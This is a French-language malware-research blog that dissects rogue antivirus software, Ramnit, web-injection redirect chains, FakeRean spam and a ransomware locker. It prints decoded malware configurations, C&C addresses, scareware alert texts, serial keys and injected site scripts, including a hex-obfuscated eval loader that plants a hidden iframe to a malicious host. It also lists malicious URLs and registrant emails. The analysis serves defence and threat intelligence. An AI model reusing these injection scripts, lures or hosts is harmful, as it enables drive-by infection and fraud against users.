Les fichiers sont fréquemment mis à jour, par exemple:

Taille: 450 048 octets
SHA1: 84fc66902098366b0af364d9cc92e6a84fbc3abf
Last-Modified: Sat, 19 Mar 2011 01:00:05 GMT

Taille: 455 168 octets
SHA1: 9522886667b7c5c136c64d7478f3e0a0e5aa3ca4
Last-Modified: Sat, 19 Mar 2011 08:00:05 GMT

Taille: 455 680 octets
SHA1: 4a1ae14726f260e3446530e4fd68371a3afc8c8d
Last-Modified: Sat, 19 Mar 2011 10:15:04 GMT

Néanmoins, tous les échantillons observés sont packés UPX.

Retrait de la première couche UPX.
On place un BPX sur le PE Header sous Olly.

Pour les habitués, nous sommes en présence de Mystic Compressor.

Le fichier fait 307 200 octets.
Retrait de la deuxième couche UPX.
On arrive à des tailles d'~680K.

MD5: 6f1ca9af6833ebd88181f44fb6f89dff
SHA1: 44d3edc361dd8927f8256738533e0b0fb13c04b8

Ce binaire est distribué simultanément via plusieurs sources.
Les ressources contiennent de manière encodées des informations.
Exemple: La configuration.

¦System Tool¦

1¦2011¦

2¦somedomain.com¦

3¦/install.php?affid=%s¦

4¦http://%s/buy.php?affid=%s¦

5¦iexplore.exe¦

6¦SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce¦

7¦SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall¦

8¦This copy of System Tool is unregistered¦

9¦Yes¦

10¦No¦

11¦Windows has detected spyware infection!

Click this message to install the last update of Windows security software...¦

12¦Warning: Your computer is infected¦

13¦Application cannot be executed. The file %s is infected.

Please activate your antivirus software.¦

14¦ThisIsPayFormClass¦

15¦Attention! System detected a potential hazard (TrojanSPM/LX) on your computer

that may infect executable files. Your private information and PC safety is at risk.

To get rid of unwanted spyware and keep your computer safe you need to update your current security software.

Click Yes to download official intrusion detection system (IDS software).¦

16¦Security Monitor: WARNING!¦

17¦http://%s¦

18¦Press OK to clean your PC right now.¦

19¦WARNING!¦

20¦Enter Serial¦

21¦?affid=¦

22¦213.229.110.95¦

23¦http://systemtoolonline.com/¦

24¦/dbg.php?affid=%s&h=%s¦

25¦Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)¦

26¦Content-Type: application/x-www-form-urlencoded¦

27¦http://pcsecuritysolutions.biz/¦

34¦89.187.53.223¦

35¦c:\mscheck.dbg¦

37¦Don't stop me! I give work and money for you!¦

38¦%d infections cleaned. Reboot required.¦

39¦ThIsIsReGiStErEdMuTeX¦

40¦qdbkprgy159eho¦

41¦Don't stop me! I need some money!¦

900¦G41w1rkF1rm4A5Du¦

999¦a¦

Vous l'aurez compris, le délimiteur est le caractère "¦"
Pour décoder, une seul et unique routine (0x41E070)

aeadisrv.exe¦

alg.exe¦

audiodg.exe¦

csrss.exe¦

conhost.exe¦

ctfmon.exe¦

dwm.exe¦

explorer.exe¦

httpd.exe¦

iastordatamgrsvc.exe¦

iexplore.exe¦

lsass.exe¦

lsm.exe¦

mfnsvc.exe¦

mdnsresponder.exe¦

nvscpapisvr.exe¦

nvvsvc.exe¦

nvsvc.exe¦

pdagent.exe¦

searchindexer.exe¦

services.exe¦

slsvc.exe¦

smss.exe¦

snort.exe¦

spoolsv.exe¦

svchost.exe¦

system¦

taskhost.exe¦

wininit.exe¦

winlogon.exe¦

wmiprvse.exe¦

winroute.exe¦

wscntfy.exe¦

wuauclt.exe¦

rundll32.exe¦

firefox.exe¦

opera.exe¦

alg.exe¦

csrss.exe¦

services.exe¦

slsvc.exe¦

smss.exe¦

spoolsv.exe¦

svchost.exe¦

system¦

lsass.exe¦

lsm.exe¦

nvsvc.exe¦

wininit.exe¦

winlogon.exe¦

WNDS-S0DF5-GS5E0-FG14S-2DF8G¦

WNDS-JUYH3-24GHJ-HGKSH-FKLSD¦

WNDS-89OF7-7324R-5SAD4-TG68U¦

WNDS-HFVDR-9844O-U54DA-5TBSC¦

WNDS-G8FB6-1V87S-DRT1S-63SRG¦

WNDS-4BGY2-JY4KO-IT98Y-7HJ43¦

WNDS-5D1V2-XB0D5-JT1TY-97DS3¦

WNDS-F40SA-1ER5H-4FG5D-F8412¦

WNDS-SERFH-2642S-F04SD-64FG1¦

WNDS-S0DF5-GS5E0-FG14S-2DF8G¦

WNDS-452S3-ER00F-TSE35-S8FSD¦

WNDS-FGS5D-649RG-4S53D-412SF¦

WNDS-4TS8R-D6F5D-4JH8T-U4JK5¦

WNDS-2AE32-1VFC2-B6894-G67YU¦

WNDS-P9685-4H41A-DSW3A-2R64T¦

WNDS-5SRTS-AEHUF-YA54S-D6F35¦

WNDS-A1SDF-RY4E8-7U98D-F1GB2¦

WNDS-A1SDF-6AS4D-RF5RE-79G84¦

WNDS-TTUYJ-7UO54-G561H-J1D6F¦

WNDS-G84H6-S854F-79ZA8-W4ERS¦

WNDS-6W954-FX65B-41VDF-8G4JI¦

WNDS-U94KO-LF4G4-1V8S1-2CRFE¦

WNDS-TGN15-RFF29-AASDJ-ASD65¦

AAAA-BBBBB-CCCCC-DDDDD-EEEEE¦

WNDS-ADEEF-FEADD-2FEAA-3EFA7¦

WNDS-ADEEE-3ADEF-4A78C-32768¦

YOUR'RE  IN  DANGER!¦

YOUR  COMPUTER  IS  INFECTED  WITH  SPYWARE!¦

ALL  YOU  DO  WITH  COMPUTER  IS  STORED  FOREVER  IN  YOUR  HARD  DISK.¦

WHEN  YOU  VISIT  SITES,  SEND  EMAILS...  ALL  YOUR  ACTIONS  ARE¦

LOGGED.  AND  IT  IS  IMPOSSIBLE  TO  REMOVE  THEM  WITH  STANDARD  TOOLS.¦

YOUR  DATA  IS  STILL  AVAILABLE  FOR  FORENSICS.  AND  IN  SOME  CASES¦

FOR  YOUR  BOSS,  YOUR  FRIENDS,  YOUR  WIFE,  YOUR  CHILDREN.¦

Every  site  you  or  somebody  or  even  something,  like  spyware,  opened  in  your  browsers,¦

with  all the images,  and  all the downloaded  and  maybe  later  removed  movies  or  mp3  songs  -¦

ARE  STILL  THERE  and  could  break  your  life!¦

SECURE  YOURSELF  RIGHT  NOW!¦

REMOVE  ALL  SPYWARE  FROM  YOUR  PC!¦

A problem has been detected and Windows has been shut down to prevent damage¦

to your computer.¦

¦

The problem seems to be caused by the following file: NTFS.SYS¦

¦

PAGE_FAULT_IN_NONPAGED_AREA¦

¦

If this is the first time you've seen this stop error screen,¦

restart your computer. If this screen apears again, follow¦

these steps:¦

¦

Check to make sure any new hardware or software is properly installed.¦

If this is a new installation, ask your hardware or software manufacturer¦

for any windwos updates you might need.¦

¦

If problems continue, disable or remove any newly installed hardware¦

or software. Disable BIOS memory options such as caching or shadowing.¦

If you need to use Safe Mode to remove or disable components, restart¦

your computer, press F8 to select Advanced Startup Options, and then¦

select Safe Mode.¦

¦

Technical information:¦

¦

*** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000)¦

¦

¦

*** NTFS.SYS - Address 0xFBFE7617 base at 0xFD3094C2, DateStamp 3d6abeff¦

 ¦

C:/windows/system32/iesetup.dll¦

Spyware.IEMonster.d¦

Steals passwords from Internet Explorer, Mozilla Firefox, Outlook and other programs.¦

autorun¦

Zlob.PornAdvertiser.ba¦

Adware that displays pop-up/pop-under advertisements of pornographic or online gambling Web sites.¦

autorun¦

Spyware.IMMonitor¦

Program that can be used to monitor and record conversations in popular instant messaging applications.¦

C:/windows/system32/svchost.exe¦

Win32.Rbot.fm¦

An IRC controlled backdoor that can be used to gain unauthorized access to a victim's machine.¦

autorun¦

Infostealer.Banker.E¦

Steals sensitive information from the infected computer (e.g. logins and passwords from online banking sessions).¦

C:/windows/system32/cmdial32.dll¦

Dialer.Xpehbam.biz_dialer¦

A Dialer that loads pornographic material. The url information shows Hardcore Pornographic pages.¦

autorun¦

Spyware.KnownBadSites¦

Uses the Windows hosts file to redirect your browser to a malicious site when you try to access a valid site.¦

autorun¦

Trojan.Tooso¦

Trojan.Tooso is a trojan which attempts to terminate and delete security related applications.¦

C:/windows/system32/explorer.exe¦

Trojan.MailGrabber.s¦

Trojan horse that gets access to e-mail accounts on the infected computer.¦

C:/windows/system32/alg.exe¦

Trojan.Alg.t¦

Trojan program that can compromise your private information stored on the hard drive.¦

C:/Program Files/TrustedAntivirus¦

TrustedAntivirus¦

A corrupt and misleading anti-virus program that may be usually installed with the help of malcous Trojans and other malware¦

C:/Program Files/SecurePCCleaner¦

SecurePCCleaner¦

Rogue Security Software: fake Security software that uses deceptive means for installation and purpose.¦

C:/windows/system32/¦

Trojan.BAT.Adduser.t¦

This Trojan has a malicious payload. It is a BAT file. It is 1129 bytes in size.¦

C:/windows/system32/¦

Spyware.007SpySoftware¦

Program designed to monitor user activity. May be used with or without consent.¦

C:/windows/hidden/¦

Trojan.Clicker.EC¦

Trojan.Clicker.EC is an information stealing Trojan that masquerades as a legitimate system file so as to avoid detection and subsequent removal.¦

C:/windows/hidden/¦

Dialer.Trafficjam.a¦

Dialer.Trafficjam.a is a premium-rate phone dialer that automatically invokes paid access to various porn-related Web sites.¦

hidden autorun¦

Trojan.Poison.J¦

Trojan.Poison.J is a key-logging Trojan for the Windows platform.¦

Registry¦

Adware.eXact.BargainBuddy¦

A browser helper object that monitors internet browsing sessions in an attempt to redirect search queries and distribute unsolicited advertisements.¦

C:/windows/system32/¦

Win32.Delbot.AI¦

Win32.Delbot.AI is a worm and IRC backdoor that exploits system and software vulnerabilities in order to provide remote access to the host PC.¦

C:/windows/temp/¦

Win32.Sdbot.ADN¦

A worm and IRC backdoor that exploits system and software vulnerabilities in order to provide unmitigated remote access to the host machine.¦

C:/windows/¦

Trojan-Dropper.Win32.Agent.bot¦

This Trojan is designed to install and launch other malicious programs on the victim machine without the knowledge or consent of the user.¦

C:/windows/temp/¦

Win32.Rbot.CBX¦

A worm and IRC backdoor that exploits system and software vulnerabilities in order to provide unmitigated remote access to the host machine.¦

autorun¦

Win32.PerFiler¦

Win32.PerFiler is designed to retrieve and install files when executed. Win32.PerFiler is configured to download from either a designated web or FTP site.¦

hidden autorun¦

Win32.Miewer.a¦

A Trojan Downloader that masquerades as a legitimate system file. Associated processes connect to the Internet to download additional malicious files.¦

C:/windows/¦

Trojan-Downloader.VBS.Small.dc¦

This Trojan downloads other files via the FTP protocol and launches them for execution on the victim machine without the user’s knowledge.¦

autorun¦

Win32.Peacomm.dam¦

A Trojan Downloader that is spread as an attachment to emails with news headlines as the subject lines which downloads additional security threats.¦

C:/windows/system/drivers/¦

Win32.Spamta.KG.worm¦

A multi-component mass-mailing worm that downloads and executes files from the Internet.¦

C:/windows/system/drivers/etc/¦

Trojan.IRCBot.d¦

A worm that opens an IRC back door on the infected host. It spreads by exploiting the  Windows Remote Buffer Overflow Vulnerability.¦

C:/windows/system/mui/¦

Trojan.Dropper.MSWord.j¦

A Microsoft Word macro virus that drops a trojan onto the infected host.¦

C:/windows/system/mui/¦

Win32.Clagger.C¦

This is small Trojan downloader that downloads files and lowers security settings. It is spreading as an email attachment.¦

C:/windows/system/¦

Worm.Bagle.CP¦

This is a \"Bagle\" mass-mailer which demonstrates typical \"Bagle\" behavior.¦

C:/windows/¦

Win32.BlackMail.xx¦

This dangerous worm will destroy certain data files on an infected user's machine on February 3, 2008.¦

hidden autorun¦

Trojan.Win32.Agent.ado¦

Trojan downloader that is spread as an attachment to a spam email and tries to download a password stealer.¦

autorun¦

Win32.Outsbot.u¦

A backdoor Trojan that is remotely controlled via Internet Relay Chat (IRC). It exploits Sony Digital Rights Management (DRM) software to hide its presence.¦

autorun¦

Win32.PerFiler¦

Win32.PerFiler is designed to retrieve and install files when executed. Win32.PerFiler is configured to download from either a designated web or FTP site.¦

hidden autorun¦

Win32.Miewer.a¦

A Trojan Downloader that masquerades as a legitimate system file.¦

C:/windows/¦

Trojan-Downloader.VBS.Small.dc¦

This Trojan downloads other files via the FTP protocol and launches them for execution on the victim machine without the user’s knowledge.¦

autorun¦

Win32.Peacomm.dam¦

A Trojan Downloader that is spread as an attachment to emails with news headlines as the subject lines which downloads additional security threats.¦

ccsvchst.exe¦

msseces.exe¦

msascui.exe¦

570069006E0064006F007700730020005400610073006B004D0061006E0061006700650072000000¦

500072006F00630065007300730020004500780070006C006F007200650072000000¦

500072006F00630065007300730020004800610063006B0065007¦

4F0072006900670069006E0061006C00460069006C0065006E0061006D006500000074006100730

06B006D00670072002E006500780065000000¦

500072006F00630065007300730020004800610063006B006500720020007500730065007300200

0740068006500200066006F006C006C006F00770069006E006700200063006F006D0070006F006E00¦

4F0072006900670069006E0061006C00460069006C0065006E0061006D0065000000500072006F0

063006500730073004800610063006B00650072002E006500780065000000¦

2A000500010043006F006D00700061006E0079004E0061006D0065000000000077006A0033003200

0000000046000F000100460069006C0065004400650073006300720069007000740069006F006E00

00000000500072006F00630065007300730020004800610063006B00650072000000000028000400

0100460069006C00¦

Windows TaskManager 73006B004D0061006E0061006700650072000000¦

Process Explorer 00780070006C006F007200650072000000¦

Process Hackep 020004800610063006B0065007¦

OriginalFilenametaskmgr.exe 00650000007400610073006B006D00670072002E006500780065000000¦

Process Hacker uses the following compon 740068006500200066006F006C006C006F00770069006E006700200063006F006D0070006F006E00¦

OriginalFilenameProcessHacker.exe 0072006F0063006500730073004800610063006B00650072002E006500780065000000¦

*[0x05,0x01]CompanyNamewj32F[0x0F,0x01]FileDescriptionProcess Hacker([0x04,0x01]

Fil 6300720069007000740069006F006E0000000000500072006F00630065007300730020004800

610063006B006500720000000000280004000100460069006C00¦

OPERATION B107 - DéCAPITATION DU BOTNET RUSTOCK

Archive: Rustock and All That
http://www.securelist.com/en/analysis/204792011

Demise of Rustock ?
http://cbl.abuseat.org/rustock.html

Has the reported disruption of Rustock affected spam levels?
http://blog.commtouch.com/cafe/anti-spam/has-the-reported-disruption-of-rustock-affected-spam-levels/

M86 Security - Rustock down?
http://labs.m86security.com/2011/03/rustock-down/

Operation b107 - Rustock Botnet Takedown
http://blogs.technet.com/b/mmpc/archive/2011/03/18/operation-b107-rustock-botnet-takedown.aspx

Taking Down Botnets: Microsoft and the Rustock Botnet
http://blogs.technet.com/b/microsoft_blog/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

Good guys stop Rustock using novel botnet killer tactics
http://lastwatchdog.com/good-guys-stop-rustock-tactic-botnet-killer/

An overview of Rustock
http://blog.fireeye.com/research/2011/03/an-overview-of-rustock.html

Congrats Microsoft, US Marshals & others.

LA COULISSE DE RAMNIT

Nous avons eu l'occasion d'étudier un peu les caractéristiques de "Ramnit", plus précisément les souches A, B et C du virus. Notre ami Nico devrait, en principe, rédiger un article dans les prochaines semaines sur le sujet alors nous allons éviter de lui ôter le pain de la bouche. Voici néanmoins quelques trucs amusants, des exclus, et des détails insolites.

La communication avec le C&C se fait avec son propre protocole sur le port 443/TCP.
Ci-dessous, vous avez la première version de l'interface de gestion.

Pas très Fair Play, voir même plutôt fourbe.

Ce que vous ne verrez probablement jamais...

L'interface actuelle du "RMN Software".

Vous avez dû vous demander pourquoi il télécharge "Google_Updater.exe" ?

00000000 00 ff 8f 00 00 00 e8 00 89 00 00 00 68 74 74 70 ........ ....http

00000010 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f ://www.g oogle.co

00000020 6d 2f 70 61 63 6b 2f 64 6f 77 6e 6c 6f 61 64 2f m/pack/d ownload/

00000030 47 6f 6f 67 6c 65 5f 55 70 64 61 74 65 72 3f 68 Google_U pdater?h

00000040 6c 3d 72 75 26 73 72 63 68 63 62 3d 6f 6e 26 66 l=ru&src hcb=on&f

00000050 6f 72 63 65 73 72 63 68 3d 6f 6e 26 68 70 64 69 orcesrch =on&hpdi

00000060 73 70 3d 6f 6e 26 68 70 63 62 3d 6f 6e 26 73 74 sp=on&hp cb=on&st

00000070 75 62 3d 6f 6e 26 63 69 4e 75 6d 3d 30 26 66 69 ub=on&ci Num=0&fi

00000080 6c 65 3d 47 6f 6f 67 6c 65 5f 55 70 64 61 74 65 le=Googl e_Update

00000090 72 2e 65 78 65 r.exe

La réponse est simple, ça sert de SpeedTest

RMN est mégalo, la chaine ASCII est omniprésente. Insolite, une fonction du panel permet de capturer en temps réel les écrans des machines infectées. Les ordinateurs sont pilotés, répondent aux besoins, actuellement ils servent principalement de relais mais... il vaut mieux ne pas en savoir d'avantage pour le moment... en tout cas, ça sux ; Ooops, socks!

Nous vous rappelons que l'espace WUP est destiné aux personnes ayant une culture malware ; les infos partagées sont au format de notes. Aujourd'hui, nous allons détailler certains mécanismes de redirections qui permettent d'assurer la redistribution de faux logiciels de sécurité via des sites piratés par injections de codes.

[+] https://encrypted.google.com/search?q=intext:%22Injection_head[SessionId=%22

Serveurs compromis
.Injections multiples
-. Remontée des statistiques
-. Scripts malveillants obfusqués
->> Batterie d'exploits
-->> Charge utile
-. Redirections diverses

) Exemple d'injection

<!--Injection_head[SessionId=01234567,version=2.0,type=FindDomainName,CRC32=76543210]-->

<script>..."http://secure.manualstats20.com/images/d"...</script>

<!--Injection_tail[SessionId=01234567]-->

SECURE.MANUALSTATS20.COM - http://malwaregroup.com/Ipaddresses/details/193.169.87.168
A noter que ce panneau d'administration est intitulé iranian.cyber.army@gmail.com
Who is the "Iranian Cyber Army"? Twitter DNS Redirect
http://garwarner.blogspot.com/2009/12/who-is-iranian-cyber-army-twitter-dns.html

) Exemple d'injection

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f

7365637572652e737461746973746963616e6f6d39312e636f6d2f696e2e7068703f746a3d646339636564356131353362

63643264222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f69667261

6d653e2729";for(x=0;<arr.length;+=2)t+=String.fromCharCode(parseInt(arr[x]+arr[x+1],16));eval(t);</script>

<!--Injection_head[SessionId=01234567,version=2.0,type=Infect,CRC32=76543210]-->

<iframe src="http://secure.statisticanom91.com/in.php?tj=...

SECURE.STATISTICANOM91.COM - http://www.malwaregroup.com/Ipaddresses/details/91.218.38.160
SECURE.STATISTICANOM91.COM - http://www.malwareurl.com/listing.php?ip=91.218.38.160

) Exemple d'injection

<!--Injection_tail[SessionId=4FB25A83]-->

<iframe src="http://lageny.com/count27.php"...

<iframe src="http://waistor.com/count28.php"...

<iframe src="http://fishum.com/count28.php"...

- http://www.malwaregroup.com/Ipaddresses/details/109.196.143.136
- http://www.malwaregroup.com/Ipaddresses/details/89.187.50.203

Les pages "count1.php" à "count31.php" font des redirections sur des urls dynamiques basées sur des DNS en *.CO.CC

La fréquence des changements de DNS est élevée.
En moyenne, ça représente +/- 760 DNS / mois.
Pour se faire une idée des couts, les tarifs:

Exemple d'informations WHOIS:

Jill Sanders (jill_sanders28@yahoo.com)
Albuquerque, NM
UNITED STATES

Les chemins sont calqués sur ce schéma:
- http://*.co.cc/get/*
- http://*.co.cc/ajax/*
- http://*.co.cc/news/*
- http://*.co.cc/user/*
- http://*.co.cc/wiki/*
- http://*.co.cc/images/*
- http://*.co.cc/download/*

Exemple d'urls dynamiques (DNS+PATH):

Thu, 11 Nov 2010 21:48:18 GMT

http://magicbrowser.co.cc/get/?tid=165&search=temp123&i=hidden

Thu, 11 Nov 2010 21:54:00 GMT

http://mildbrowser.co.cc/user/index.php?rnd=5&n=165&nav=temp123&c=on&db=enabled

Thu, 11 Nov 2010 22:11:17 GMT

http://mildalias.co.cc/user/index.php?author=temp123&php=protected&nid=165&app=undo

...

Thu, 02 Dec 2010 18:08:39 GMT

GMT http://moresuccess.co.cc/ajax/index.php?comment=165&period=temp123&app=ssl

Pour l'instant, la résolution se concentre sur l'adresse IP http://www.malwaregroup.com/Ipaddresses/details/91.204.48.50 (AS24965 (SPOINT-AS S.Point LTD)). Ces redirections pointent sur de multiples exploits, si la machine est vulnérable, téléchargement et exécution d'un PE. L'adresse IP de la victime sera aussitôt enregistrée puis black-listée.

Ci-dessous, un rapide parallèle avec les évènements précédents ; ces données étaient disponibles sur malc0de Database.

Nous avions 6 IPs uniques qui étaient 188.65.74.67, 188.65.74.161, 188.65.74.162, 188.65.74.163, 188.65.74.165, 188.65.74.166 sur AS39150 ; (UA) VLTELECOM-AS VLineTelecom LLC Moscow, Russia. Il y avait 4 fichiers situés à la racine "bat.exe", "m.exe", "new.exe" et "outlook.exe". Nous avions 98 identifiants uniques (prefix des fichiers pseudo-aléatoires) qui étaient: "24online24", "5can", "AdorebY8323z", "archi", "avpsoft", "bljat", "cash2", "click3r", "dunner", "ebulker", "eiit", "elected", "fatigue", "fuckemall", "invisible", "krevedko321", "lolekz", "mrmun", "myid37", "nasmork", "parfighter", "ppk31", "prosto", "pzeclawski", "quadra", "swnd", "test", "translater", "unix", "varag", "vlx777", "vvvvv", "wiwi", "wrath", "y0liny", "zerling".

Ici, il est question de 7 IPs uniques 109.196.143.61, 109.196.143.75, 109.196.143.133, 109.196.143.134, 109.196.143.135, 109.196.143.136, 109.196.143.137 et de 4 fichiers à la racine "1.exe", "k.exe","snupx.exe", "outlook.exe" avec 18 identifiants "5can", "abc", "asd", "avpsoft", "bruno", "cash2", "doctor", "elf", "fuckemall", "inferno", "lowboy", "myid37", "plsec", "psycho", "test", "translater", "varag", "zerling".

) Exemple d'injection

<!--Injection_head[SessionId=01234567,version=2.0,type=Infect,CRC32=76543210]-->

<iframe src="http://vdsvps.in/traffpro/in.php?s=...

<!--Injection_tail[SessionId=01234567]-->

VDSVPS.IN - http://malwaregroup.com/Ipaddresses/details/69.4.236.7

microsoftwindowsecurity112.com
microsoftwindowsecurity121.com
microsoftwindowsecurity132.com
microsoftwindowssecurity141.com
microsoftwindowssecurity138.com
... microsoftwindowssecurity*.com

Ԕ http://robtex.com/ip/91.217.162.131.html
Ԕ http://robtex.com/ip/91.217.162.186.html
Ԕ http://robtex.com/ip/91.217.162.177.html

1. Méthode douce, la redirection.
http://vdsvps.in/traffpro/in.php?s=brifr
--> http://browser-alert08.co.cc/?do=getexe&id=16
Set-Cookie: id=16
Content-disposition: attachment; filename=Setup.exe

Installation du rogue: Microsoft Security Essentials Alert
nb: Nous avons déjà traité ce sujet à plusieurs reprises.
- http://www.malwaregroup.com/Ipaddresses/details/91.217.162.174

2. Méthode brutale, les exploits du package Eleonore v1.4.1
-> http://browser-alert08.co.cc/exp/?adv=01&t=
[archive] http://wepawet.iseclab.org/view.php?hash=7d2962e856963e687b7284e14450cf44&t=1290489529&type=js

Historique du traffic
[archive] logs:: 21,632,625 bytes - http://jsunpack.jeek.org/dec/go?report=7c284e4a1f26b8512a4127302b06e889185a490b

nb: Eleonor a été installé le 30 Juin 2010 à 19:20:12 GMT
Le payload a été uploadé le 1 Juillet 2010 à 00:20:11 GTM

Les sites étaient mis à jour à l'aide d'un script indonésien ; celui-ci allait chercher sur le serveur d'affiliation nommé WWW.GOLUBOK.CO.CC ( http://www.malwaregroup.com/Ipaddresses/details/69.65.40.26 ) les nouvelles données, elles étaient ensuite stockées dans le fichier "settings.json" que voici:
a:2:{s:4:"last";i:1290517188;s:3:"url";s:39:"http://browser-alert01.co.cc/?id=16&t=b";}
Un détail mais de taille. Les informations d'enregistrement de ce nom de domaine:

Golubok Ivanovich (sh-kesha@ya.ru)

Exactement le même e-mail que celui utilisé, par le passé, par l'infâme LOADS.CC

sh-kesha@ya.ru

Les browser-alert*.co.cc (http://www.malwaregroup.com/Ipaddresses/details/69.65.48.217)

Les index de ces sites simulent de faux scan antivirus en ligne.

Windows Security has found critical process activity
on your system and will perform fast scan of system files

Dans les scripts, une image hébergée sur INSTALL-MONEY.COM (
http://www.malwaregroup.com/Ipaddresses/details/89.187.53.227 )
[archive] L'index tel qu'il était il y a plusieurs mois.

<html><head></head><body>

<script language="javascript">

document.location.href="http://browser-alert08.co.cc/?id=00&t=b";

</script></body></html>

Simple TDS v1.3 Beta (MySQL version)

Nous l'avons mis en évidence, ces installations sont relativement anciennes.
Mais le 30 novembre 2010, que s'est t'il passé ? Une remise en service ?

Certains éléments nous font penser qu'il y a eu une nouvelle affiliation.
Cette fois-ci avec Money Extreme (MONEYEXTRE.ME (94.100.25.230))

D'après le descriptif, il s'agit d'un gentil service de type "Pay Per"

Qui propose plusieurs portails/vitrines dans le but d'installer le programme.
- http://94.100.25.227/dl/d/100219827?id=305
- http://94.100.25.228/dl/d/100219827?id=305
- http://94.100.25.229/dl/d/100219827?id=305

Habituellement, nous avions quelque chose comme:
- http://vdsvps.in/traffpro/in.php?s=brain
-(302)> http://microsoftwindowssecurity155.com/a10/index.html
-(200)> http://microsoftwindowssecurity155.com/a10/TrojanRemovalKit.exe

Alors qu'au 30 novembre 2010, nous avions:
- http://vdsvps.in/traffpro/in.php?s=brain
-(302)> http://sexzakachaiko.in/dl/d/100219827?id=305
Content-Disposition: attachment; filename="Avatar-Avatar-2009-Blu-ray-1080p.exe"
Content-Length: 8547005

Ce n'était probablement qu'un test ; toujours est-il qu'ils sont encore en activité.

WIN32.FAKEREAN: EMAILS AUX DIFFéRENTES ALLURES AVEC .ZIP EN PIèCE JOINTE

U-Haul Contract %d

Your U-Haul contract is attached. Please call us if we can answer any questions or address any concerns about the attached receipt. Are empty boxes still piled up after your move? You can help reduce the demand for natural resources and help others by returning to any U-Haul center and placing your reusable boxes in the U-Haul Take-a-Box / Leave-a-Box display for others to take and use free of charge. We appreciate your business and we look forward to serving you again in the future!

Pièce jointe: "Receipt_%d_1.zip"

D'autres templates sont utilisés, par exemple celui-ci.

Subject: Resume

Hey,
Haven't had time to revise...this one is a bit wordy I think but it's what I have. I have a cover letter also...I'll send it over when we are ready to send the resume.
Thanks - A

Pièce jointe: "Resume[%d].zip"

L'échantillon décortiqué ci-dessous correspond au fichier:
MD5: 58a50da2f57aa1a842b82f4402988afa
SHA-1: 49d81ded7f16f8c878a4535e91b97c6f29921c32
AV: Trojan-Downloader.Win32.FakeRean ; Trojan.Kazy.A

Le nom de la classe revient assez souvent dans les précédents échantillons.
CreateWindowExA(WS_EX_TOOLWINDOW, "DialeriBlockertray", "",...

Le programme efface les traces de ses éventuels téléchargements.
DeleteFile("C:\\dropper.exe:Zone.Identifier")

Une particularité: concaténation du timestamp (GetSystemTimeAsFileTime) au DNS.
Exemple: "1284475093.httpdsconfig.com"

DnsQuery("1284475093.httpdsconfig.com", DNS_TYPE_TEXT, DNS_TYPE_MG, NULL, ppQueryResultsSet, NULL)

Vérifie que le "C:" correspond bien à un disque dur (GetDriveTypeA) puis récupère les informations de ce support. (GetVolumeInformationA) Extrait les données de l'entrée de registre DigitalProductId. ( http://support.microsoft.com/kb/941461/fr ) L'ensemble de ces infos permettent de créer un identifiant unique pour chaque machine. Le mutex généré est lui aussi unique et commencera par "RUN"

La majorité des chaines de caractères sont dissimulées.

http://%s/httpss/v=%d&step=%d&hostid=%s

101=affid=

102=INFO

103=FILE

104=REPORT

105=http://%s/getfile.php?r=%d&p=

106=STATUS

107=OK

108=FAILED

109=RUN

110=RUNFAILED

111=MAGIC

112=MD5

113=FILEINFO

114=RUN

115=ID

116=TRK

117=OP

118=MACHINE

119=NOCFG

120=%s: Zone.Identifier

121=RUNA

122=RUNU

Rapport: http://anubis.iseclab.org/?action=result&task_id=14a7596d9741d9984e175f08bbee404d7

Rappel: la variable hostid correspond à l'identifiant de la MACHINE.

La variable p est une valeur encodée en base64.

MACHINE=E05686A02CEE3EBC9D9B48759CC52E6D
OP=INFO
TRK=24

Le serveur réponds avec des informations dissimulées dans le format GIF.
Une seconde requête est effectuée mais cette fois l'opération (OP) sera FILE.

installer_m.exe

Nous avions déjà abordé le sujet plusieurs fois par le passé.
Le format GIF utilisé est valide et constitue une enveloppe pour le binaire crypté.
Une technique souvent utilisée pour passer à travers les filtrages.

Une partie de la config du binaire se présente sous cette forme.
{

"p":"securitysoftwaretechltd2010.com",
"l":"httpssite.in",
"r":"httpsgate.in",
"c":"totalcodecpack.com"

}

Résultat du parcours manuel du site.
- http://totalcodecpack.com/download
- https://pay2us.biz/?v=1-V438835&s=1064&c=26&p=1079
- https://pay2us.biz/pago.cgi?wmid=84030772&producto=P465&idioma=1&clave=402O5KTDOIPZ1284473074

-- $9.95 / Total Codec Pack (LifeTime license)
        CUSTOM_VARIABLE=26
        VENDOR_ID=1-V438835
        SITE_ID=1064
        PROD_ID=1079

- PAY2US.BIZ & PAY2US.ORG

http://malwaregroup.com/Ipaddresses/details/69.197.147.186
http://malwaregroup.com/Ipaddresses/details/69.197.147.187
http://malwaregroup.com/Ipaddresses/details/69.197.147.188
http://malwaregroup.com/Ipaddresses/details/69.197.147.189
http://malwaregroup.com/Ipaddresses/details/69.197.147.189
- http://www.robtex.com/cnet/69.197.147.html

http://malwaregroup.com/Ipaddresses/details/204.12.226.170
http://malwaregroup.com/Ipaddresses/details/204.12.226.173
http://malwaregroup.com/Ipaddresses/details/204.12.223.187
http://malwaregroup.com/Ipaddresses/details/204.12.223.189
http://malwaregroup.com/Ipaddresses/details/204.12.223.190
- http://www.robtex.com/cnet/204.12.223.html

AS32097

69.197.147.184/29

Name: Imagenet Techologia
Handle: C02232326
Street: 324 E. 11th St.
Suite: 1000
City: Kansas City
State/Province: MO
Postal Code: 64106
Country: US

204.12.192.0/18

Name: Krutik Servers
Handle: C02377413
Street: 324 E. 11th St.
Suite 1000
City: Kansas City
State/Province: MO
Postal Code: 64106
Country: US

RANSOMWARE: MICROSOFT SECURITY ANTIVIRUS

Les cybercriminels ne manquent jamais d'imagination pour gagner de l'argent facilement. Ici, la stratégie employée consiste à vérrouiller le poste de travail de l'utilisateur et d'afficher un splash screen permanent. La fenêtre intitulée Microsoft Security Antivirus contient un message en russe qui stipule que pour retrouver une activité normale, vous devrez effectuer un paiement de 400 roubles. Dans ce cas précis, le malchanceux devra envoyer un SMS au numéro 89030064850. Ne payez jamais ces rançons.

Pour débloquer celui-ci, utilisez le code: 77294738T

